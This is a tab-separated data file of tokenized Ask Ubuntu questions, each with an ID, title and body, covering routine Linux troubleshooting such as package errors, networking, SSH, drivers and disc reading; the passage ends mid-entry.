300623	i can not remove the package burg	i can not remove the package burg and console show me errors : root @ iskander-des : ~ # sudo apt-get autoremove burg чтение списков пакетов… готово построение дерева зависимостей чтение информации о состоянии… готово пакет «burg» не установлен , поэтому не может быть удалён пакеты , которые будут удалены : burg-theme-dark-shine обновлено 0 , установлено 0 новых пакетов , для удаления отмечено 1 пакетов , и 0 пакетов не обновлено . не установлено до конца или удалено 1 пакетов . после данной операции , объём занятого дискового пространства уменьшится на 1 720 kb . хотите продолжить [ д/н ] ? y ( чтение базы данных … на данный момент установлено 299082 файла и каталога . ) удаляется пакет burg-theme-dark-shine … generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : ошибка при обработке параметра burg-theme-dark-shine ( -- remove ) : подпроцесс установлен сценарий post-removal возвратил код ошибки 1 отчёты apport не записаны , так достигнут maxreports при обработке следующих пакетов произошли ошибки : burg-theme-dark-shine e : sub-process /usr/bin/dpkg returned an error code ( 1 )
300629	heartbeat ubuntu server 12.04 is not assigning virtual ip ?	i have two nfs servers and i have configured heartbeat on my both servers but when i started heartbeat it do not aign virtual ip to my servers nfs-server-1 ( eth0 172.16.203.20 ) nfs-server-2 ( eth0 172.16.203.21 ) virtual ip ( 172.16.203.23 ) i configures /etc/heartbeat/ha.cf as follows on both servers same logfacility local0 # used to tell heartbeat which log facility to utilize for logging keepalive 2 # interval between heartbeat packets currently every 2 secs you could also use 2000ms deadtime 5 # timeout before the other server takes over ping 172.16.203.20 # address to ping to determine if we are alive udpport 694 # port to listen in on for broadcasts made by heartbeat bcast eth0 # device to use for broadcasts baud 38400 # speed of serial device serial /dev/ttys0 # serial device to use node nfs-server-1 # dns name of one of our two nodes node nfs-server-2 # dns name of other of our two nodes auto_failback on # very important or auto failover wo n't happen and /etc/heartbeat/haresources as follows also same on both server nfs-server-1 ipaddr : :172.16.203.23/16/eth0 nfs-kernel-server but when i test my servers ifconfig -a eth0 link encap : ethernet direcciónhw 08:00:27:3d : a1 : fb direc . inet:172.16.203.20 difus . :172.16.255.255 másc:255.255.0.0 dirección inet6 : fe80 : :a00:27ff : fe3d : a1fb/64 alcance : enlace activo difusión funcionando multicast mtu:1500 métrica:1 paquetes rx:18934 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:5581 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:1000 bytes rx:3556847 ( 3.5 mb ) tx bytes:715714 ( 715.7 kb ) lo link encap : bucle local direc . inet:127.0.0.1 másc:255.0.0.0 dirección inet6 : : :1/128 alcance : anfitrión activo bucle funcionando mtu:16436 métrica:1 paquetes rx:54 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:54 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:0 bytes rx:5304 ( 5.3 kb ) tx bytes:5304 ( 5.3 kb ) whats wrong is with my configuration ?
300630	how to make drag & drop to move files instead of copy on xfce desktop ?	on the xfce 12.10 desktop drag & drop to move files into a folder would copy them instead of moving ( cut/paste ) them . i tend to have many files on the desktop and usually i grab them and put them in a folder for further use etc . i want to be able to do this by drag & drop , but at the present drag & drop makes a duplicate of them in that folder without removing them from their previous location . in xfce i use the default thunar , and it handles the desktop .
300634	`` btrfs filesystem show '' gives me `` failed to read '' errors	my /home is a raid1 btrfs partition spanning two disk . as far as i can tell , it 's working fine . this morning i wanted to check the status of the partition so i entered the btrfs filesystem show command and i only got errors : $ btrfs filesystem show /dev/sdd1 failed to read /dev/sdb failed to read /dev/sdb1 failed to read /dev/sdc failed to read /dev/sdc1 failed to read /dev/sdd failed to read /dev/sdd1 btrfs v0.20-rc1 what is the problem ?
300639	did i do something wrong while installing ubuntu to my new computer ?	i installed ubuntu while on my windows 8 desktop with the installer . now when i boot my cpu and selects the operating system ubuntu my computer says it failed to start because some type of file is missing . this is a gateway computer running windows 8 . and for some reason my cpu wont boot from my removable disk . but my other laptop will . any help is appreciated .
300641	set myself as owner of /etc with chown command now getting all kinds of errors	i needed to edit a .config file ( which i know for a fact is not creating these problems , just to clear that up ) and it would n't let me save it , so i took ownership of /etc and all contents with the command chown -hr /username /etc and that let me edit the .config file but now whenever i try to install any packages or use any sudo commands , it does n't work ( i 've checked for errors in the sudo file in sudoers.d and there was nothing wrong with that ) . so how do i return it to the previous owner ?
300645	ca n't play videos in totem - error says that we 're missing plugins that should not be missing	relevant : during install i already clicked the box to allow restricted content . recently i also installed ubuntu-restricted extras . these videos used to work on previous install with no problem . formats are mp4 , webm , and avi . the error is `` totem could not startup . some necessary plug-ins are missing . make sure that the program is correctly installed '' .
300647	apache cassandra install causes dependency failure	i am trying to install cassandra on ubuntu machine , i have set entries in /etc/apt/sources.list file deb http : //www.apache.org/dist/cassandra/debian 10x main deb-src http : //www.apache.org/dist/cassandra/debian 10x main but when i run apt-get install cassandra after update i am getting following error message . the following packages have unmet dependencies : cassandra : depends : jsvc ( > = 1.0 ) but it is not going to be installed depends : libcommons-daemon-java ( > = 1.0 ) but it is not going to be installed depends : libjna-java but it is not going to be installed syslinux-common : breaks : syslinux ( < 2:4.05+dfsg-2 ) but 4.02-8 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i have also tried -f option , but it wo n't worked for me . what is going wrong ?
300651	how can i change the unity launcher delay in ubuntu 13.04 ?	i know this question has been asked before , but i can not adjust the delay in ubuntu 13.04 following the older suggestions .
300655	what kind of cypher do ubuntu uses on its full disk encryption ?	one important thing that make me install 13.04 instead of the stable 12.04 lts is the encryption of the installation . i want to achieve the same in windows 7 with truecrypt . i want to know what kind of encryption do ubuntu uses for the disk encryption utility that comes with 13.04+ ( aes , serpent , etc ... / hash ) and so i would like to know if only the installation filesystem is protected or the swap is also cyphered ( whole disk ) . thanks !
300659	makeshift hybrid hdd setup	i have an idea i want to try , but just curious if it would work . i want to install ubuntu 's root folder onto a 16gb sd card and set /home to my 1tb internal drive . is there a way to accomplish this to have the faster response time of the ssd card , but keep the storage option of the standard drive ?
300668	no answer section using dig	i 've got an assignment from school to setup a dns server with 2 name servers in ubuntu server using ipv6 , but i 'm not very good at it . when i use the dig command , it does n't show an answer section . does anyone got an idea why this is the case and how i can solve it ? dig @ 127.0.0.1 mickey.acme.exa http : //snag.gy/gv1hx.jpg here you can see some config files : in /etc/bind/named.conf.options i left the forwarders { 0.0.0.0 ; } ; in comment . i do n't know if i really need this or not . /etc/bind/db.acme.exa http : //snag.gy/ou7rl.jpg /etc/bind/named.conf.local zone `` acme.exa '' { type master ; file `` /etc/bind/db.acme.exa '' ; } ;
300669	how to install/integrate/use cryptography functions with ubuntu 12.04 - in a simulator software	i am currently working on a vehicular simulator , where i need to use some security functions , like hashing , pseudonyms , pkcs-ecc keys , etc . what shall i do ? shall i download these functions ? if yes , what is the source ? and how to use it in the simulator software ? thank you
300670	is there any ability to set primary monitor	i want my primary display be at the right and my tv ( additional ) be at the left . in that case new windows shall appear at the tv . can i somehow set where new windows will appear ?
300677	different download speeds in ifstat and chrome	i am downloading a file in chromium and in parallel running ifstat ( a network-monitoring app ) . it 's the only file i 'm downloading . the two programs show varying different speeds , and never the same , why 's that ?
300680	ubuntu 12.04 upgrade to ubuntu 13.04 stalled	my update manager and error report programs were broken in ubuntu 12.04 , so i decided to remove 12.04 altogether and upgrade to 13.04 . the error i am getting is : ( process:8276 ) : glib_critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed the internet at my house is unstable . so after several hours of something `` installing '' , the internet had to be reconnected . after a while longer , i opened up ubuntu help , here , and the error showed up . the time count when i opened up the internet was at about 14 hours into `` installation . '' i have no idea what to do . ps . i am downloading from a disk , not update manager . solved : i quit the upgrade , then opened ubuntu as a temporary os , copied the home folder off , most of the files anyway , and completely reinstalled . works now .
300682	what represent .xauthority file ?	i had a problem wherein i could n't get passed the login window in ubuntu 12.04 , even though i have the correct username and password , it still comes back to the login screen . i 've found a solution wherein i would change the ownership of the .xauthority in my home folder . these are the steps that i 've taken : ctrl+alt+f1 when i 'm in the login screen . then change the ownership of .xauthority which is previously owned by root by executing . the following command : chown username : username .xauthority what is this .xauthority file in the first place ? why does changing the file fixed my problem of being unable to login ?
300683	laptop locks up at very random times . hard reset needed . syslog entry is	may 24 21:45:28 js-ubue430 signond [ 2949 ] : ../../../../src/signond/signondaemon.cpp 360 init failed to suid root . secure storage will not be available . what on earth is this ? this can happen if my laptop is idle , if i 'm on irc , if i 'm just on a web browser doing simple browsing , etc . it happens as much as 3 times a day or as randomly as once every 3-4 days . i have no idea what 's causing it , but this entry is the only common thing i 'm seeing . each time it locks up , i check the time ( since the time wo n't pass since it 's frozen ) . i 'll let a few minutes go by , reboot , and check syslog for the last entry of the minute it froze . the above is what i keep seeing . any ideas ?
300684	uninstall intellij ultimate edition version 12	my evaluation licence has recently expired for intellij ultimate edition version 12 . i want to uninstall the application but do not have an option to in ubuntu software centre . can someone please point me in the right direction ? i 'm a ubuntu noob so learning as i go with this . i 'm currently looking around my file system at what is installed as part of intellij using a few guides related to mac . i 'm using ubuntu 12.04
300685	how do i use/enable zcache ?	i 'd like to try out zcache but i just ca n't figure out how i would enable it , do i have to compile a new kernel with zcache enabled ? i 'm running ubuntu 13.04 64bit
300690	problem with cd dvd media ubuntu 12.04 lts	i am using ubuntu 12.04 lts first when i put cd with data nautilus show me blank cd , the same cd on windows 7 is read properly with data , second i cant read dvd s even if somehow dvd is mounted i see blank space . third i can`t write data on cd or on dvd . can any body help me with that ? xfbunr is not working k3b is not working brasero is not working every program fails when comes to eject media .
300697	running ubuntu from a cd does n't work for me	i have tried running the cd with the iso of linux , but nothing happens and i get back to windows 8 . is there something i am doing wrong ? i press f12 when the prompt appears , and i choose to run from cd drive , and nothing happens .
300701	unable to run a sequence of commands using ssh	i am unable to use a couple of sudo commands while logging in through ssh . i am using the following command but its not working properly . ssh hypr1000.opsr.com `` ot=sudo virsh list -- all |grep running| awk ' { print $ 2 } ' | tail -2 ; sudo virsh dominfo $ ot '' this is the returned error message : error : command 'dominfo ' requires < domain > option what should i do to make this command run successfully ?
300706	how to save config change on chntpw and quit terminal ?	so , i used the chntpw to clear my windows 8 admin password , but it does not apply the change when i restart the computer . i read in some places that the config needs to be saved before closing the terminal , but none of the commands that i 've found ( such as ctrl+o ; esc ; : wq ) works ! i do n't know what to do ... . can someone save me ? ... . _
300710	why ca n't i create users ?	i ca n't create users . i updated from 12.10 to 13.04 and only see one user , the two others are gone , i upgraded keeping my files .
300711	unable to install drivers for linux brother dcp-j140w printer	i 'm not able to install the drivers for dcp-j140w brother printer . brother page for linux shows four drivers , of which i can install only the last two ( scanner ) . therefore , the first two ( printer ) it 's the main problem . another problem , it 's that the printer is recognize by my pc , it does print the check impression , but the location file of the printer is empty .
300718	xubuntu power settings file	i 'd like to create a toggle for suspending/doing nothing upon closing the lid for xfce . for that , i need to find out where is the following setting stored : creating the toggle script and panel indicator wo n't be a problem afterwards .
300720	is there a way to use xfce integration features with unity ?	is there a way to use systray icons , pager icons , etc of xfce apps in the unity desktop ? orage is an awesome calendar app , but i want to use unity with it , as that 's my preferred de .
300721	running an executable file made from matlab code	i used the matlab deploy tool to make my code executable and a standalone . it created a folder containing 2 folders inside . those 2 folders have the executable files inside ( prog1 ) and a file called run_prog1.sh . what should i do to run that file ? i click on it and it doesnt open anything .
300722	internet not working after rebooting computer	so basically , i downloaded an audio driver because my speakers were really quiet and i wanted to see if it would fix it . it wanted me to do a reboot , so i did . and that 's where everything went wrong . i booted my computer back up , it went to a black screen and said a bunch of crap , which kindof confused me , but it eventually started like normal . i went to google chrome and typed youtube.com so i could test if the audio drivers fixed my problem , and google chrome replied with a very welcoming `` this webpage is not available '' ! so , i found network settings , and found that i had no connections in my network settings . i came to this computer , my family 's computer , and looked up my problem . the first thing i found was a solution that said to go delete some things from /etc/udev/rules.d/70-persistent-net.rules then reboot , and it said that the file would detect my ethernet and automatically put back what is supposed to be there . sadly , instead of doing that , it simply left that blank , so i 'm sure i messed up even more by doing that . then , on another solution , it said to go to .etc/init.d/apache2/httpd.conf and add servername localhost to it . that did n't work either . now i 'm here . it 's running 64-bit ubuntu 12.04 lts . it 's a gateway pc which originally had windows vista on it . ( not sure if that information will help you at all , but may as well give you it anyway ) sorry for such a long post , thanks for reading my problem , and i hope someone can give me an answer .
300723	updating ubuntu while dual booting with windows 8	i have a machine that has windows8 preinstalled , i dual booted ubuntu 13.04 with it and everything is working fine , im a bit new to linux so had a few doubts.. when 13.10 /14.04 lts is released , how do i upgrade 13.04 so as to keep the dual boot intact ? will i have to perform a bootrepair again ? will updating ubuntu every 6 months slow down the performance of the machine ? is there a specific way to upgrade without losing performance ? if i want to upgrade ubuntu to 14.04/13.10 with a clean install and still keep windows 8 dual boot , how do i do it ? is it merely wiping the ubuntu partition and doing a clean install and boot repair ? or anything else ? thanks for all the help guys .. : )
300728	gufw for console ?	i like the gufw , but need something similar for console . i mean an interactive software without need to remember all the command line keys . could you suggest one ?
300729	ubuntu installed into partition of external hd not booting	i recently installed ubuntu 13.04 onto two partitions on my external hard drive . i did n't use the whole drive because i have other things on it . when i installed , i manually selected one partition for ext4 and the other for swap . this all worked fine but when i rebooted and selected the hd from the boot menu , all it showed was a flashing prompt .
300731	dvds not playing	to put it simply , i 'm trying to watch and rip dvds on my computer , but it never works . i have vlc and libdvdcss , but the dvd just does n't load and evidently , does n't play . could you guys help me out with this ?
300732	openssh two factor authentication	i 'm using ubuntu server 13.04 and want to use openssh for sftp . i have everything set up and the only thing not working is the two factor authentication . currently it asks for a password or the public key but i need it to ask for a password and a public key . it seams that there is a parameter in the sshd_config for that : requiredauthentications { 1,2 } it is listed here : linux.die.net so i added this line to the /etc/sshd_config requiredauthentications2 publickey , password but sshd -t would always give this error /etc/ssh/sshd_config : line 26 : bad configuration option : requiredauthentications2 my version of openssh is 6.1.p1-4 . from this post i figured that it is only available in openssh-6.2 : ( the last post ) : bugzilla.mindrot.org to test this on another computer with linux mint i tried to compile this version from source as it is not available for ubuntu stable . i did this using auto-apt as suggested in these tutorials www.howtogeek.com -1 www.howtogeek.com -2 the result is the same on the linux mint computer . so i 'm stuck for the moment . p.s . : somewhere else i found you could use a second authentication script but i 'm not sure if this is a good and secure solution . i want to use the server with normal ftp programs like winscp or filezilla from windows . i do n't know if they would understand that way of authentication .
300733	how would i use deja dup on a password protected smb share ?	how would i use deja dup to backup to a password protected smb ( on a samba server ) share ? note : not a duplicate , i put a bounty on my previous question , and nobody answered it after a month .
300744	copy the content/file to all subdirectory in a directory using terminal	i wan na copy a file to all sub-folders of a folder . a command example would be very helpful .
300745	how to install vga ( ati - radeon 9200 se ) for ubuntu 12.04 lts	pleas help to install my vga i downloaded my driver and when i want to install it , i see this error : sh ati-driver-installer-8.28.8.run creating directory fglrx-install verifying archive integrity ... all good . uncompressing ati proprietary linux driver-8.28.8 ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . -e ================================================== -e ati technologies linux driver installer/packager -e ================================================== detected configuration : architecture : i686 ( 32-bit ) x server : unable to detect removing temporary directory : fglrx-install
300749	i/o error while reading a certain vcds that plays well in windows in the same system	this is an annoying problem in ubuntu 12.04/12.10/13.04 that i ca n't play a certain vcds . this is not a missing codec or encrypted content issue - it raises an i/o error . well , i suspected the vcd might have physical damages . but no , it is actually not , it plays well in windows 7 and the problem persists even in fresh vcds . now let me give some very basic information : in particular there are 3 *.dat files in the /mpegav directory . theo @ theo-desktop ~/vcd1/mpegav $ ls -l -h total 660m -r -- -- -- -- 1 theo theo 2.5m jun 6 2007 avseq01.dat -r -- -- -- -- 1 theo theo 3.4m jun 6 2007 avseq02.dat -r -- -- -- -- 1 theo theo 654m jun 6 2007 avseq03.dat the first two files are played or copied successfully without any error while the last one raises an i/o error . theo @ theo-desktop ~/vcd1/mpegav $ vlc avseq03.dat vlc media player 2.0.4 twoflower ( revision 2.0.3-289-g6e6100a ) [ 0x11a2028 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . `` sni-qt/5685 '' warn 22:03:44.080 void statusnotifieritemfactory : :connecttosnw ( ) invalid interface to snw_service [ 0x7f9944001488 ] filesystem access error : failed to read ( input/output error ) [ 0x7f99440015d8 ] main stream error : can not pre fill buffer while copying the file using usual cp command , an i/o error is raised . putting a sudo before cp does n't change anything . theo @ theo-desktop ~/vcd1/mpegav $ cp avseq03.dat test.dat cp : can not create regular file `test.dat ' : read-only file system theo @ theo-desktop ~/vcd1/mpegav $ cp avseq03.dat ~/test.dat cp : reading `avseq03.dat ' : input/output error cp : failed to extend `/home/theo/test.dat ' : input/output error now another try with dd command . it does create a output file of 1.7mb only . theo @ theo-desktop ~/vcd1/mpegav $ dd if=/dev/sr0 of=~/desktop/vcd1.iso dd : reading `/dev/sr0 ' : input/output error 3232+0 records in 3232+0 records out 1654784 bytes ( 1.7 mb ) copied , 1.50804 s , 1.1 mb/s before issuing all these commands i manually mounted the vcd file . theo @ theo-desktop ~ $ sudo mount -t iso9660 /dev/sr0 vcd1 mount : block device /dev/sr0 is write-protected , mounting read-only accessing the files from default mountpoint /media/theo/videocd results in the very same thing . just to emphasise the point that this is a fresh vcd , no physical damages and plays/ copies perfectly in windows . while another certain number of vcds has only one *.dat file in their mpegav directory , ( specially in the part 2 , which does n't have title/intros etc ) , plays/ copies without any error in ubuntu . this disturbs me very much why it 'd not play in linux while it plays well in windows . i do n't want to keep windows only for playing vcds . i do have a very large collection of vcds which i ca n't play or rip here . and this same problem remained unresolved since january , see here : ubuntu 12.10 can not play vcd
300750	can not update from software updater	i tried updating my 13.04 from software updater . i had about 202.9 mb to download . when i click `` install now '' and then a message came saying `` it has to install from unauthenticated sources '' . i click ok and then the software updater exits ... there is no way i can update due to this problem .
300752	having problem with nvidia drivers	so i am currently using 12.04 and have a gtx 580m , when i go to check the drivers it says that i dont have any proprietary drivers currently installed , so i am unable to download any newer ones ( obviously . ) my problem is that i have been told that i will need to install the newest drivers in order for playonlinux etc . when i try and install the .run file direct from the nvidia site it says that i need to close x server first , however when i go into x server it says '' you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . '' i have tried this in terminal and get this message '' using x configuration file : `` /etc/x11/xorg.conf '' . validation error : data incomplete in file /etc/x11/xorg.conf . device section `` default device '' must have a driver line . backed up file '/etc/x11/xorg.conf ' as '/etc/x11/xorg.conf.nvidia-xconfig-original' backed up file '/etc/x11/xorg.conf ' as '/etc/x11/xorg.conf.backup' new x configuration file written to '/etc/x11/xorg.conf' does anyone know how i can go about getting this to work ? edit : i have tried stopping x server through terminal and all this does is close the gui , it still wont allow me to apply the drivers
300753	cd free or dvd send for post mail	previously sent you a copy on cd or dvd software ubuntu . would you like to know if you even send mail these cds or dvds ? thank you . i from guatemala
300756	can i download ubuntu onto a flash drive using windows xp ? it does n't recognize the iso file	for some reason the universal usb installer from pendrivelinux.com does not recognize the iso file i downloaded . i am wondering if maybe it is because i am using windows xp . it seems like all the tutorials are using windows 7 . thank you for your help .
300762	catalyst 13.1 installation on ubuntu 12.04 : debclean not found	i am trying to install the amd catalyst version 13.1 driver on ubuntu 12.04 lts ( desktop version ) . i have downloaded the *.run file corresponding to the driver version . amd-driver-installer-catalyst-13.1-linux-x86.x86_64.run i am following the instructions to install catalyst here : http : //askubuntu.com/a/126513 all the dependencies were downloaded as well . when i run : it fails to build the package with the error : generating package : ubuntu/precise package build failed ! package build utility output : ./packages/ubuntu/ati-packager.sh : 294 : ./packages/ubuntu/ati-packager.sh : debclean : not found ... . ... . make : *** [ binary-arch ] error 2 dpkg-buildpackage : error : debian/rules binary gave error exit status 2 i downloaded devscripts as well to fix the error related to debclean . sudo apt-get install devscripts reading package lists ... done building dependency tree reading state information ... done devscripts is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 189 not upgraded . as you can see , i have the latest version of debclean installed . even after this , it fails to build the package when i run with the same error specific to `` debclean not found '' . how can i fix this error ? sudo sh amd-driver-installer-catalyst-13.1-linux-x86.x86_64.run -- buildpkg ubuntu/precise thanks .
300771	keyboard shortcut to access gnome panel like unity	in unity the sortcut alt + f10 allows to access the unity menu , including appmenu and appindicators . does gnome shell have a similar shortcut to manage the panel with the keyboard ?
300775	error message while sudo apt-get -f install	could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable )
300776	can not open software center after upgrading to 13.04	i just upgraded to 13.04 and when i tried to open software center it darkens and 'not responding ' . i eventually had to force quit .
300781	install 3g irvine ( maybe huawei ) dongle on ubuntu 12.04	i have an irvine ( which may actually be huawei ) 3g usb modem . i live in india . i use ubuntu 12.04 . i am using an airtel sim card in the modem . on plugging in the modem , it shows up in 'edit connections ' . however , there is no option to connect to it in the list of available networks displayed on clicking the network icon ( the one in the shape of a sector of a circle ) . i have usb-modeswitch and usb-modeswitch-data already installed . here 's the extra line in the output of lsusb when the modem is present : bus 002 device 005 : id 20a6 : f00e i have also attempted the instructions on this page - 3g usb modem not working in 12.04 ; and it 's still not working ! i 've tried the modprobe , the echo to usbserial , and wvdial ( which did n't detect any modem ) . could anyone please give me ideas on what i could try next ? here 's the relevant lines from usb-devices - t : bus=02 lev=01 prnt=01 port=03 cnt=01 dev # = 6 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=20a6 prodid=f00e rev=00.00 s : manufacturer=modem s : product=modem device s : serialnumber=000000000002 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage as you can see , it 's detecting it as a modem , but perhaps using the usb-storage driver .
300782	how to open the command line in chrubuntu ?	i would like just in case i need to make chrome the default again , to open a terminal window . where is the terminal applications located in chrubuntu ? is there any key-shortcut that allows me to directly prompt for terminal ?
300783	ubuntu 13.04 freezes every few seconds	no matter which application i 'm running , ubuntu completely freeze for about 3 seconds and then unfreeze . this happens just about every 10-15 seconds without fail . i just recently updated to 13.04 and all software is completely upgraded . system specs : macbook pro intel core 2 duo 8 gbs ram 1 tb hd ( dual partition 500 gbs each - mac osx / ubuntu )
300784	s-video problems xubuntu 13.04	i installed for the first time linux and it 's a great move for me . xubuntu came out of the box with almost everything working perfectly . i have a problem though , when i try to see the image from the screen onto the tv , the image is moving continuous and very fast to the left ( on tv ) . i tried different software to output the image in different resolutions . i tried to make for s-video output , custom resolutions and refresh rates in the terminal , but the image is still moving ( in windows was ok , but do n't wan na go back ) . my laptop : asus f3u , graphic card *-display description : vga compatible controller product : rs690m [ radeon xpress 1200/1250/1270 ] vendor : advanced micro devices [ amd ] nee ati physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=radeon latency=64 resources : irq:47 memory : c0000000-cfffffff memory : fd6f0000-fd6fffff ioport:8800 ( size=256 ) memory : fd500000-fd5fffff tv- sony ke-32ts2e http : //www.sony.co.uk/support/en/product/ke-32ts2e/manuals i can connect to tv only through s-video . please help . ps : if you know a good website with tutorials for using the terminal and xubuntu in general , please share . thanks
300787	unable to ssh to machine . outbound ssh works . sshd is running on port 22	i have an ubuntu 12.10 machine on my lan to which all ssh connections time out . let 's call it 'f ' ( for fail ! ) two other machines 'a ' and 'b ' on the same lan can connect to each other . i can also ssh from f to a . so i do n't believe there is a network config issue . the problem seems to be confined to machine f. following various other forums answers , i 've verified and tried the following . verify sshd is running and listening on port 22 : f $ ps -a | grep sshd 853 ? 00:00:00 sshd f $ sudo ss -lnp | grep sshd listen 0 128 : ::22 : : : * users : ( ( `` sshd '' ,4244,4 ) ) listen 0 128 *:22 * : * users : ( ( `` sshd '' ,4244,3 ) ) f $ sudo lsof -i | grep ssh sshd 4244 root 3u ipv4 53321 0t0 tcp * : ssh ( listen ) sshd 4244 root 4u ipv6 53323 0t0 tcp * : ssh ( listen ) ssh 5244 michael 3u ipv4 82208 0t0 tcp localhost:40209- > cubebot : ssh ( established ) sshd 5245 root 3u ipv4 83301 0t0 tcp cubebot : ssh- > localhost:40209 ( established ) sshd 5362 michael 3u ipv4 83301 0t0 tcp cubebot : ssh- > localhost:40209 ( established ) f $ netstat -nat | grep 22 tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen tcp 0 0 192.168.1.28:41782 74.125.225.209:443 established tcp 0 0 192.168.1.28:47576 74.125.142.125:5222 established tcp 0 0 192.168.1.28:54925 91.189.89.122:443 established tcp 0 0 192.168.1.28:54762 74.125.225.167:443 established tcp 0 0 192.168.1.28:48473 74.125.225.181:443 established tcp 0 0 192.168.1.28:36177 74.125.225.198:443 established tcp6 0 0 : ::22 : : : * listen try telnet : a $ telnet f 22 trying 192.168.1.28 ... telnet : unable to connect to remote host : connection timed out the same thing happens with ssh . the ip address for f is correct : f $ ifconfig wlan1 link encap : ethernet hwaddr 00:1a:70:3b:58:2e inet addr:192.168.1.28 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21a:70ff : fe3b:582e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:22070 errors:0 dropped:0 overruns:0 frame:0 tx packets:15344 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:12137460 ( 12.1 mb ) tx bytes:2564022 ( 2.5 mb ) the hosts look correct : f $ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 cubebot # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters where cubebot is machine 'f ' and the hostname is correct : $ cat /etc/hostname cubebot using localhost and hostname on machine f both work : f $ ssh localhost welcome to ubuntu 12.10 ( gnu/linux 3.5.0-31-generic x86_64 ) f $ ssh cubebot welcome to ubuntu 12.10 ( gnu/linux 3.5.0-31-generic x86_64 ) output of sudo iptables -l -nv : chain input ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 65 8910 accept tcp -- * * 127.0.1.1 0.0.0.0/0 tcpflags : ! 0x17/0x02 4468 479k accept udp -- * * 127.0.1.1 0.0.0.0/0 4850 337k accept all -- lo * 0.0.0.0/0 0.0.0.0/0 4 336 accept icmp -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 10/sec burst 5 2139 384k drop all -- wlan1 * 0.0.0.0/0 255.255.255.255 1898 327k drop all -- * * 0.0.0.0/0 192.168.1.255 0 0 drop all -- * * 224.0.0.0/8 0.0.0.0/0 0 0 drop all -- * * 0.0.0.0/0 224.0.0.0/8 0 0 drop all -- * * 255.255.255.255 0.0.0.0/0 0 0 drop all -- * * 0.0.0.0/0 0.0.0.0 1 40 drop all -- * * 0.0.0.0/0 0.0.0.0/0 state invalid 0 0 lsi all -f * * 0.0.0.0/0 0.0.0.0/0 limit : avg 10/min burst 5 674k 975m inbound all -- wlan1 * 0.0.0.0/0 0.0.0.0/0 0 0 log_filter all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 log flags 0 level 6 prefix `` unknown input '' chain forward ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 0 0 accept icmp -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 10/sec burst 5 0 0 log_filter all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 log flags 0 level 6 prefix `` unknown forward '' chain output ( policy drop 524 packets , 88964 bytes ) pkts bytes target prot opt in out source destination 0 0 accept tcp -- * * 192.168.1.28 127.0.1.1 tcp dpt:53 0 0 accept udp -- * * 192.168.1.28 127.0.1.1 udp dpt:53 9383 825k accept all -- * lo 0.0.0.0/0 0.0.0.0/0 0 0 drop all -- * * 224.0.0.0/8 0.0.0.0/0 0 0 drop all -- * * 0.0.0.0/0 224.0.0.0/8 0 0 drop all -- * * 255.255.255.255 0.0.0.0/0 0 0 drop all -- * * 0.0.0.0/0 0.0.0.0 49 3372 drop all -- * * 0.0.0.0/0 0.0.0.0/0 state invalid 383k 20m outbound all -- * wlan1 0.0.0.0/0 0.0.0.0/0 524 88964 log_filter all -- * * 0.0.0.0/0 0.0.0.0/0 524 88964 log all -- * * 0.0.0.0/0 0.0.0.0/0 log flags 0 level 6 prefix `` unknown output '' chain inbound ( 1 references ) pkts bytes target prot opt in out source destination 669k 974m accept tcp -- * * 0.0.0.0/0 0.0.0.0/0 state related , established 4883 511k accept udp -- * * 0.0.0.0/0 0.0.0.0/0 state related , established 0 0 accept all -- * * 192.168.1.14 0.0.0.0/0 76 5013 lsi all -- * * 0.0.0.0/0 0.0.0.0/0 chain log_filter ( 5 references ) pkts bytes target prot opt in out source destination chain lsi ( 2 references ) pkts bytes target prot opt in out source destination 76 5013 log_filter all -- * * 0.0.0.0/0 0.0.0.0/0 44 2640 log tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcpflags : 0x17/0x02 limit : avg 1/sec burst 5 log flags 0 level 6 prefix `` inbound `` 44 2640 drop tcp -- * * 0.0.0.0/0 0.0.0.0/0 